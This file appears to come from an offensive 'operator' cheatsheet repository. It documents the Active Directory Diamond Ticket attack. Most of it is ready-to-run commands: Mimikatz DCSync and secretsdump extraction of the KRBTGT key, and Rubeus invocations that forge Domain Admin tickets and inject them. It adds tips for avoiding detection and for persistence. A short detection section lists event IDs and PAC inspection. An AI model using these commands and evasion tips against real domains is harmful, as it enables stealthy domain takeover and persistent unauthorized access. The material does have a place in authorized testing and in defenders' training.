daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-13-diamond-ticket-attack.md (8106B)


      1 ---
      2 title: "Attack #13 โ€” Diamond Ticket Attack"
      3 description: "The Diamond Ticket is an evolution of the Golden Ticket that was developed to bypass modern detection mechanisms. While a Golden Ticket forges a TGTโ€ฆ"
      4 category: active-directory
      5 subcategory: "Kerberos & Delegation"
      6 tags: ["active-directory", "adcs", "credential-access", "kerberos", "privilege-escalation"]
      7 tools: ["Impacket", "Mimikatz", "Rubeus", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Two/๐ŸŸ  Attack #13 โ€” Diamond Ticket Attack.md"
     11 ---
     12 # ๐ŸŸ  Attack #13 โ€” Diamond Ticket Attack
     13 
     14 ***
     15 
     16 ## ๐Ÿ“– How It Works
     17 
     18 The Diamond Ticket is an **evolution of the Golden Ticket** that was developed to bypass modern detection mechanisms. While a Golden Ticket forges a TGT entirely from scratch (meaning there is no corresponding AS-REQ in the DC logs, which is a primary detection indicator), a Diamond Ticket takes a **legitimate TGT obtained through a real AS-REQ/AS-REP exchange**, decrypts it using the KRBTGT AES key, **modifies the PAC** (Privilege Attribute Certificate) to inject elevated group memberships, then re-encrypts and re-signs it. Because the ticket originated from a real authentication event, it has a valid audit trail on the DC โ€” making it significantly harder to detect.
     19 
     20 ### Diamond Ticket vs Golden Ticket
     21 
     22 | Aspect | Golden Ticket | Diamond Ticket |
     23 |---|---|---|
     24 | **TGT source** | Forged entirely offline | Real TGT from legitimate AS-REQ |
     25 | **AS-REQ event** | โŒ Missing (primary IOC) | โœ… Present โ€” blends with normal traffic |
     26 | **PAC** | Entirely fabricated | Modified from legitimate PAC |
     27 | **KRBTGT key needed** | Yes (NT hash or AES) | Yes (AES256 required for decryption) |
     28 | **Detection difficulty** | Moderate โ€” missing AS-REQ | Hard โ€” requires PAC anomaly detection |
     29 | **OPSEC level** | Medium | High |
     30 | **Tool support** | Mimikatz, Rubeus, ticketer.py | Rubeus (`diamond` command) |
     31 
     32 ### The Full Attack Flow
     33 
     34 ```
     35 1. Obtain KRBTGT AES256 key (via DCSync)
     36 2. Request a legitimate TGT for your controlled user (real AS-REQ)
     37 3. Rubeus decrypts the TGT using the KRBTGT AES key
     38 4. Modify the PAC โ€” inject DA/EA group memberships (RID 512, 519, etc.)
     39 5. Re-encrypt and re-sign the TGT with the KRBTGT key
     40 6. Inject the modified ticket into your session
     41 7. Access any resource as DA โ€” with a clean audit trail on the DC
     42 ```
     43 
     44 ***
     45 
     46 ## โš™๏ธ Prerequisites
     47 
     48 | Requirement | Detail |
     49 |---|---|
     50 | **KRBTGT AES256 key** | Required for decryption/re-encryption โ€” NT hash alone is insufficient |
     51 | **Domain Admin or DCSync rights** | To extract the KRBTGT key |
     52 | **Valid domain user account** | Needed to request the initial legitimate TGT |
     53 | **Domain SID** | For PAC modification |
     54 
     55 ***
     56 
     57 ## ๐Ÿ› ๏ธ Tools
     58 
     59 | Tool | Platform | Notes |
     60 |---|---|---|
     61 | **Rubeus** | Windows | `diamond` subcommand โ€” primary tool for Diamond Tickets |
     62 | **Mimikatz** | Windows | DCSync to extract KRBTGT AES key (prerequisite step) |
     63 | **Impacket โ€” secretsdump.py** | Linux | Extract KRBTGT AES key from Linux |
     64 | **Impacket โ€” ticketer.py** | Linux | Can be used with modifications for PAC manipulation |
     65 
     66 ***
     67 
     68 ## ๐Ÿ’ป Full Commands
     69 
     70 ### ๐Ÿ”ต Step 0 โ€” Extract KRBTGT AES256 Key
     71 
     72 ```powershell
     73 # โ”€โ”€ Mimikatz DCSync for KRBTGT AES key โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     74 privilege::debug
     75 lsadump::dcsync /domain:corp.local /user:krbtgt
     76 
     77 # Look for: aes256_hmac: b65fb27c8e0d7c5f48b16c10b4...
     78 ```
     79 
     80 ```bash
     81 # โ”€โ”€ Linux โ€” secretsdump โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     82 secretsdump.py corp.local/Administrator:'Password1'@DC01.corp.local -just-dc-user krbtgt
     83 # Extract the aes256-cts-hmac-sha1-96 key from the kerberos section
     84 ```
     85 
     86 ### ๐Ÿ”ด Rubeus โ€” Forge Diamond Ticket
     87 
     88 ```powershell
     89 # โ”€โ”€ Standard Diamond Ticket โ€” impersonate DA โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     90 .\Rubeus.exe diamond \
     91   /krbkey:b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \
     92   /user:low_user \
     93   /password:Password1 \
     94   /enctype:aes \
     95   /domain:corp.local \
     96   /dc:DC01.corp.local \
     97   /ticketuser:Administrator \
     98   /ticketuserid:500 \
     99   /groups:512 \
    100   /ptt
    101 
    102 # Flags explained:
    103 # /krbkey     = KRBTGT AES256 key
    104 # /user       = YOUR low-priv user to request initial legitimate TGT
    105 # /password   = YOUR password for the initial TGT request
    106 # /enctype    = Force AES encryption (stealthy)
    107 # /ticketuser = The user identity to embed in the modified PAC
    108 # /ticketuserid = RID of the target user (500 = Administrator)
    109 # /groups     = Group RIDs to inject (512=DA, 519=EA, 518=Schema Admins)
    110 # /ptt        = Inject into current session
    111 
    112 # โ”€โ”€ Diamond Ticket with multiple privileged groups โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    113 .\Rubeus.exe diamond \
    114   /krbkey:b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    115   /user:low_user \
    116   /password:Password1 \
    117   /enctype:aes \
    118   /domain:corp.local \
    119   /dc:DC01.corp.local \
    120   /ticketuser:Administrator \
    121   /ticketuserid:500 \
    122   /groups:512,519,518,520 \
    123   /ptt
    124 
    125 # โ”€โ”€ Diamond Ticket with LDAP + OPSEC flags โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    126 .\Rubeus.exe diamond \
    127   /krbkey:b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    128   /user:low_user \
    129   /password:Password1 \
    130   /enctype:aes \
    131   /domain:corp.local \
    132   /dc:DC01.corp.local \
    133   /ticketuser:Administrator \
    134   /ticketuserid:500 \
    135   /groups:512 \
    136   /ldap /nowrap /ptt
    137 
    138 # /ldap = Query LDAP for accurate user/group info for the PAC (most OPSEC)
    139 
    140 # โ”€โ”€ Verify โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    141 klist
    142 dir \\DC01.corp.local\C$
    143 ```
    144 
    145 ***
    146 
    147 ## ๐ŸŽฏ OPSEC Tips
    148 
    149 - **Diamond Ticket is the stealthiest TGT-based attack** โ€” unlike Golden Ticket, a real AS-REQ exists in DC logs, so the "TGS without TGT" detection fails
    150 - **Always use AES256** โ€” RC4 encryption generates detectable anomalies; AES256 is standard
    151 - **Use the `/ldap` flag** in Rubeus to pull real user attributes for the PAC โ€” this prevents inconsistencies that could be flagged by PAC inspection
    152 - **The KRBTGT AES key is mandatory** โ€” unlike Golden Tickets which can use the NT hash (RC4), Diamond Tickets require the AES key for proper decryption/re-encryption
    153 
    154 ***
    155 
    156 ## ๐Ÿ›ก๏ธ Detection โ€” Event IDs
    157 
    158 | Event ID | Source | What to Look For |
    159 |---|---|---|
    160 | **4768** | Security Log (DC) | TGT request โ€” present (unlike Golden Ticket), but subsequent access may show elevated privileges |
    161 | **4769** | Security Log (DC) | TGS requests with privileges that don't match the user's actual group memberships |
    162 | **4624** | Security Log | Logon with DA-level privileges from a user that should be low-privilege |
    163 
    164 **Primary detection:** Diamond Tickets require **PAC-level inspection** โ€” comparing the group memberships claimed in the TGT's PAC against the user's actual AD group memberships. If a user's TGT claims membership in Domain Admins but their AD object shows no such membership, it's a forged or modified ticket. Microsoft Defender for Identity can perform this correlation.
    165 
    166 ***
    167 
    168 ## ๐Ÿ”— Attack Chain Context
    169 
    170 ```
    171 [Diamond Ticket] โ”€โ”€โ†’ Stealthy Domain Admin Persistence
    172          โ”‚
    173          โ”œโ”€โ”€โ†’ ๐ŸŽซ Stealthier Golden Ticket โ€” has real AS-REQ in DC logs
    174          โ”œโ”€โ”€โ†’ ๐Ÿฉธ Use as DA โ†’ DCSync โ†’ extract all hashes
    175          โ”œโ”€โ”€โ†’ ๐Ÿ”’ Survives password changes (until KRBTGT reset ร— 2)
    176          โ”œโ”€โ”€โ†’ ๐Ÿ”— Chain: DCSync (get KRBTGT key) โ†’ Diamond Ticket โ†’ persist
    177          โ””โ”€โ”€โ†’ ๐Ÿ’€ Defeated by: KRBTGT password reset ร— 2, PAC inspection, MDI
    178 ```
    179 
    180 ***
    181 
    182 > โœ… **Attack #13 โ€” Diamond Ticket complete.**